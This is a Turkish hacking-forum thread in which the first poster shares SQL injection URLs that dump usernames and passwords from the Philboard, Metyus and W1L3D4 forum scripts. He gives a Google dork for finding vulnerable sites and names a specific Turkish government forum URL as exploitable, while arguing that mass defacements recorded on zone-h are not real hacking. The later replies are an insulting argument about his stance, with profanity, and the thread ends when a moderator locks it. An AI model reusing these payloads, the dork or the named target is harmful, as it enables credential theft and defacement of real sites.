İşte Hack Bu Kadarda Salakça

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Ayro
    Ayro's avatar
    Erkek

w1l3d4 da :
    /W1L3D4_bolum.asp?forumid=-99+union+all+select+0,1,2 ,3,4,5,6,7,8,9,password,username,12,13,14,15,16,17,18,19,20+ from+users

metyusta ve phillboard da:
    philboard_forum.asp?forumid=-99+union+all+select+0,1,2%20,3,4,5,6,7,8,9,password,username,12,13,14,15,16,17,18,19,20+%20from+users

gördüğünüz gibi açıklar var.Googledan "inurl:philboard_forum.asp?forumid" diye arattım (" tırnaklar yok) bir sürü site çıktı.Şimdi hepsine teker teker uğraşıp zone-h a kaydede bilirdim.Fakat saçmalık gördüğümden ellemiyorum niye mi?

Çünkü açığı herhangi bir siteden bulabilirsiniz.Bir sürü site bilmem ne forum sql inj der.Yukardaki forumda w1l3d4, metyus, philboard forumları.Sanırım hepsi philboard dan editlemiş benim demiş.NEyse bu açığı ben bulmadım.Bu açıktan tek kazancım reklam olur o kadar.

Yani demek istediğim zone-h a milyonlarca site hackleyince heykır olunuyor ya işte budur.Saçma sapan forumların saçma sapan açıkları bulunup hepsi googleda itina ile aranıp indiriliyor.Bir portalın, forumun açığındna çıkıp bir sürü site indirmek çok basit.

Peki ya tek bir siteyi hedef alıp açığını bulmak?İşte oturup adam gibi kasılırsa gerçekten kendi açığını bulursan yada bir forumun, bir sitenin üzeirne yoğunlaşırsan sonucunda zevk duyarsın.Ama böyle emeği hiçe sayan forumların açığını bulmak çokta zor olmasa gerek.

http://ooegm.meb.gov.tr/forum/philboard_forum.asp?forumid=11

Bunda bile açık var.Sitesi cilek portal.Kodları elimde.Bira zuğraşmayla site bile iner.Gov.tr de ne oldu ben hacker mı olmuş oldum.İşte bu yüzden zone-h ı sevmem bu yüzdne oraya saçma salak işleri kaydedenleri sevmem bu yüzden bana sen ne yaptın zone-h ta adın geçiyor mu diyenlere engel koyarım.

Şimdi içinizden hacker hayranı çıkıp benim yazılarımı editleyecek büyük ihtimalle hacked by bilmem ne yazıp zone-h a verecek.Daha googledan site bulmayı yeni bitirdim ve işte buraya açtım.Gördüğünüz gibi benim hiç bir şekilde birşeyden kaygım yoktur.Paylaşımın sonunu düşünüyorum ne olrusa olsun buyrun diyorum.

Zone-h a binlerce siteyi giriyorlar.İŞte orda aynı türden forumları giren gerzek gerizekalı aptallar bu yolu kullanıyor.Kim alınırsa alınsın bu hackerlık değildir.Ordaki gövde gösterisidir başka hiç bir şey değil.Fakat zone-h ta oturup kendi açıklarıyla iş yapan adamlar var onlarıda gönülden kutluyorum.

2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    alacakaranlik
    alacakaranlik's avatar
    Erkek

Güzel

eskilerden kim kaldı..
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    mkportal
    mkportal's avatar
    Erkek
    eyw.zaten hackerı m dediğin zaman her şeyi bilecen

AXİ-HACKER,AXİ-CYBER
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Google
    Google's avatar
    Erkek
    alkışlıyorum hacım,etrafımızda bunlara kapılmış bi dünya insan var ki gerçekten oturup baktığımda gülüyorum,niçin tahribat işte bu yüzden tahribat...

Abra Kadabra
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ~$
    ComputerWolf
    ComputerWolf's avatar
    Üstün Hizmet Madalyası
    Erkek
    Ya hacilar  Zone-h kayitlarini baz alip ben hackerim demek ile Nil Demirkazik DTP'den milletvekili adayi olmus ya iste Nil DemirKazigin simdi cikip ben aydinim demesi ayni seydir....Nil Demirkazigi ne kadar sikliyorsaniz Zone-h ida o kadar sikleyin.....bir domaine ait 1000tane subdomaine ait index'i kabul eden zone den ne beklenir amk :S ... www.kariyer.net bilisim alanina bakin hangi alanda eleman araniyor gozlemleyin oturup o alanlara yonelik calisin...siktir edin hangi portalda hangi acik var ...smf de acik cikmismi...yeni exploit yayinlanmismi...bosverin kariyer.net rulezZz. :)

Hep denedin. Hep yenildin. Olsun yine dene , yine yenil ama daha iyi yenil !
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    RemotE
    RemotE's avatar
    Banlanmış Üye
    Erkek

Şimdi içinizden hacker hayranı çıkıp benim yazılarımı editleyecek büyük ihtimalle hacked by bilmem ne yazıp zone-h a verecek.Daha googledan site bulmayı yeni bitirdim ve işte buraya açtım.Gördüğünüz gibi benim hiç bir şekilde birşeyden kaygım yoktur.Paylaşımın sonunu düşünüyorum ne olrusa olsun buyrun diyorum.

Yanlış Yere yazdın heralde bunları burası WC yada Starhack Yada powerhack değil .. burada herkesin farklı yönlerde bilgileri olan kişiler. bir ders vermek istiorsan farklı siteye git zumsuk . seni severim ama .konuşmarın beni itiyor . Burda kimse öyle senin bilgileri alıpta ben hack yapayım . şu siteyi forumu deface edeyim diye bi kafa yok . Eğer yapmak isterlersede zaten bilgisine güvenen insanlar kendileri herşeyi yapabilior ... + o Salakca olan şey hack değil senin salaklığın iki forum açığına hack ibaresini koyupta hack e salakca diyemezsin dersen bu sitede işin yok o zaman ..

Set By RemotE . ..

Bizi Satanı Biz Bedavaya Veririz..! http://www.intikal.org - http://www.ohbea.com
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Ayro
    Ayro's avatar
    Erkek
    RemotE bunu yazdı:
    -----------------------------

Yanlış Yere yazdın heralde bunları burası WC yada Starhack Yada powerhack değil .. burada herkesin farklı yönlerde bilgileri olan kişiler. bir ders vermek istiorsan farklı siteye git zumsuk . seni severim ama .konuşmarın beni itiyor . Burda kimse öyle senin bilgileri alıpta ben hack yapayım . şu siteyi forumu deface edeyim diye bi kafa yok . Eğer yapmak isterlersede zaten bilgisine güvenen insanlar kendileri herşeyi yapabilior ... + o Salakca olan şey hack değil senin salaklığın iki forum açığına hack ibaresini koyupta hack e salakca diyemezsin dersen bu sitede işin yok o zaman ..

Set By RemotE . ..

-----------------------------
    Hoca burasının starhack, wc yada başka yer olmadığını en az snein kadar iyi biliyorum emrak etme sen.

Burada konu açmak sana compuya modlara yada reneye holyone a ders vermek değildir.Burda konu açmak herkeze hitap eder bu sitede hackle ilgilenmeye başlamış başlayan yada herhangi bir olaya girişen kısımlar vardır.

Bu konuda işte hack bu kadar salakça başlığının anlamını gerçekten anlamanı istiyorum.Hack olayını basitleştirmem.Birisine abi adam uçmuş dediğinde uçuyor mu?Aynı bunun gibi brudaki hack kavramı zone-h a bir sürü site ekleyip sonunda tvlere çıkan tipleirn kavramıdır.

Hack hakkında bir konu açıp konuşabilmem yada hacker hakkında kesin salakça yargısına varabilmem için daha çok ileri seviyede olmam lazım.Burda anlatmak istediğim hack olayının kesinlikle bu olmadığı hackerların bu tip adamlar olmadığıdır.

Sanıryoum konu mesajını okumadın okuduysanda ne demek istediğimi anlamadın.Bir açık bulundu forumu editleyenler emeğe saygısızlık yapanlar vardı bir kaç nedenle daha googleda ufak bir araştırma ile forumu kullananlar bulundu.Göstermek istediğim bir siteyi scriptte açık bulunduktan sonra ingirmek bu kadar basit.

Kusura bakma eğer ben pc hacke pc hack dmeiyorsam msn mail i fake şu bu ile hacklemek olarak görmüyorsam.Web hackte scriptlerin açığından 100 tane siteyi deface etmeyi hackerlık oalrak görmüyorsam bu benim salaklığım değildir.Eğer birisi rusların şunların bunların bulduğu bir script açığını alıp kullanıyorsa ben hackerım diyorsa işte o onun salaklığıdır.

İstediğin kadar yazılarımı itici bul.Zaten bu konuya yazıların itici diye başlıyrosan buda konuyla dğeil benle ilgili mesaj yazmaya başladığının, ön yargılı olduğunun göstergesidir.Bu yüzden seninle bu konuyu bile konuşmak saçmalıktır benim için.Bana değil konuya mesaj yaz yazacaksan.Yada benimle ilgili bir mesaj yazacaksan konuya karıştırma.

edit:

Sizin içinizden hacker hayranı çıkacak dediğim olayı var.Elbette tahribattakileri bahsetmiyorum.Tahribata başka sitelerden gelip yazanlar ve iskorpitx zihniyetinde insanlar var.İşte onlar forumda sırf itibartları artsın diye yapacaklardır.Başıma geldiği içn söylüyorum

8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    decameron
    decameron's avatar
    Üstün Hizmet Madalyası Bilgi/Destek Madalyası Savaş Madalyası
    Erkek
    http://youtube.com/watch?v=8c3YRPGppPM Ajdar'ı izleyip sakinleşelim lütfen (: yakışmıyor böyle tartışmalar koca koca adamlara , esefle kınıyorum :|

Etinden korkanın kemiğini sikeyim!
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    RemotE
    RemotE's avatar
    Banlanmış Üye
    Erkek
    Konu Yönünü Şaşırdı.. ( Kilit ) .

Bizi Satanı Biz Bedavaya Veririz..! http://www.intikal.org - http://www.ohbea.com
Toplam Hit: 2348 Toplam Mesaj: 9